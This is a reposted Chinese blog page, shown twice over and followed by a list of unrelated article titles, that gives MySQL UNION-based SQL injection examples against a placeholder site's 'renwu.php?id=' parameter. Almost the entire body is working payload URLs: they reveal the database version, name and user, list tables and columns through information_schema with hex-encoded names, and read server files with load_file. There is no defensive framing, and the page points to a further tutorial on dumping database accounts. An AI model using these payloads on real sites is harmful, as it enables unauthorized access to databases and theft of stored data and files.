SQL注入
来源:互联网 发布:欧姆龙plc网络通信 编辑:程序博客网 时间:2024/04/25 20:39
###########################################
#MYSQL高级注入实例
###########################################
----------------------------------- 系统信息 -------------------------------------------
http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 1,2,version(),4,5
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 1,2,database(),4,5
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 1,2,user(),4,5
-------------------------------- 爆数据库的表 -------------------------------------------------
http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 0,0,concat(table_name),0,0 from (select * from (select * from information_schema.tables where table_schema=0x61797363 order by table_schema limit 0,1) t order by table_schema desc)t limit 1-- /0x61797363是爆出的数据库aysc(database())的16进制 爆出位置0的表 注意从0开始
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 0,0,concat(table_name),0,0 from (select * from (select * from information_schema.tables where table_schema=0x61797363 order by table_schema limit 2,1) t order by table_schema desc)t limit 1-- /爆出位置2的表
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 0,0,concat(table_name),0,0 from (select * from (select * from information_schema.tables where table_schema=0x61797363 order by table_schema limit 10,1) t order by table_schema desc)t limit 1-- /爆出位置10的表
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
------------------------------- 爆出字段 -------------------------------------------------------------
http://www.vulnsite.com//renwu.php?id=10 and 1=2 union select 0,0,concat(cast(count(*) as char)),0,0 from information_schema.columns where table_name=0x6364625f696d6167657479706573 and table_schema=0x61797363 limit 1-- /0x6364625f696d6167657479706573是选择一个表 0x61797363是数据库账户 16进制
//爆出含有多少字段
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
http://www.vulnsite.com//renwu.php?id=10 and 1=2 union select 0,0,concat(column_name),0,0 from (select * from (select * from information_schema.columns where table_name=0x6364625f696d6167657479706573 and table_schema=0x61797363 order by 1 limit 0,1) t order by 1 desc)t limit 1--
//爆出数据库账户 0x61797363 中的表 0x6364625f696d6167657479706573 的 0 位置 的字段 (必须转换16进制)
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
http://www.vulnsite.com//renwu.php?id=10 and 1=2 union select 0,0,concat(column_name),0,0 from (select * from (select * from information_schema.columns where table_name=0x6364625f696d6167657479706573 and table_schema=0x61797363 order by 1 limit 1,1) t order by 1 desc)t limit 1--
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
// 爆出数据库账户 0x61797363 中的表 0x6364625f696d6167657479706573 的 1 位置 的字段 (必须转换16进制)
-----------------------------爆出数据数据 ----------------------------------------------------------------
联合查询
这个不说了
-----------------------------跨库?得到数据库账户?--------------
参考我的教程 php注入爆数据库账户
http://u.115.com/file/f86e56c2cb
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
----------------------------- 读数据文件--------------
/renwu.php?id=10 and 1=2 union select 0,0,concat(load_file(16进制的地址)),0,0 --
#MYSQL高级注入实例
###########################################
----------------------------------- 系统信息 -------------------------------------------
http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 1,2,version(),4,5
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 1,2,database(),4,5
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 1,2,user(),4,5
-------------------------------- 爆数据库的表 -------------------------------------------------
http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 0,0,concat(table_name),0,0 from (select * from (select * from information_schema.tables where table_schema=0x61797363 order by table_schema limit 0,1) t order by table_schema desc)t limit 1-- /0x61797363是爆出的数据库aysc(database())的16进制 爆出位置0的表 注意从0开始
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 0,0,concat(table_name),0,0 from (select * from (select * from information_schema.tables where table_schema=0x61797363 order by table_schema limit 2,1) t order by table_schema desc)t limit 1-- /爆出位置2的表
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 0,0,concat(table_name),0,0 from (select * from (select * from information_schema.tables where table_schema=0x61797363 order by table_schema limit 10,1) t order by table_schema desc)t limit 1-- /爆出位置10的表
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
------------------------------- 爆出字段 -------------------------------------------------------------
http://www.vulnsite.com//renwu.php?id=10 and 1=2 union select 0,0,concat(cast(count(*) as char)),0,0 from information_schema.columns where table_name=0x6364625f696d6167657479706573 and table_schema=0x61797363 limit 1-- /0x6364625f696d6167657479706573是选择一个表 0x61797363是数据库账户 16进制
//爆出含有多少字段
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
http://www.vulnsite.com//renwu.php?id=10 and 1=2 union select 0,0,concat(column_name),0,0 from (select * from (select * from information_schema.columns where table_name=0x6364625f696d6167657479706573 and table_schema=0x61797363 order by 1 limit 0,1) t order by 1 desc)t limit 1--
//爆出数据库账户 0x61797363 中的表 0x6364625f696d6167657479706573 的 0 位置 的字段 (必须转换16进制)
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
http://www.vulnsite.com//renwu.php?id=10 and 1=2 union select 0,0,concat(column_name),0,0 from (select * from (select * from information_schema.columns where table_name=0x6364625f696d6167657479706573 and table_schema=0x61797363 order by 1 limit 1,1) t order by 1 desc)t limit 1--
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
// 爆出数据库账户 0x61797363 中的表 0x6364625f696d6167657479706573 的 1 位置 的字段 (必须转换16进制)
-----------------------------爆出数据数据 ----------------------------------------------------------------
联合查询
这个不说了
-----------------------------跨库?得到数据库账户?--------------
参考我的教程 php注入爆数据库账户
http://u.115.com/file/f86e56c2cb
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
----------------------------- 读数据文件--------------
/renwu.php?id=10 and 1=2 union select 0,0,concat(load_file(16进制的地址)),0,0 --
- SQL注入--GET注入
- 注入攻击--SQL注入
- 【sql注入】mysql注入
- SQL注入
- SQL注入
- SQL注入
- sql注入
- SQL注入
- SQL注入
- SQL注入
- SQL注入
- sql注入
- SQL注入
- SQL注入
- SQL注入
- SQL注入
- SQL注入
- sql注入
- Android 射击类游戏 (一)
- ABAP 指針常用语法
- PHPMailer发送邮件
- 北京大学百年讲堂内听果宁法师讲人生——提得起、放得下的深刻含义(摘抄)
- Mac OS X 10.7(Lion)系统下显示用户主目录下的Library目录
- SQL注入
- android NDK之Log
- 关于android中service与线程
- SAP DOI调用Excel例子
- 锁表机制
- 开博啦
- 数据挖掘之关联规则挖掘之Apriori算法实现
- SAP Archiving (归档)
- 说说free命令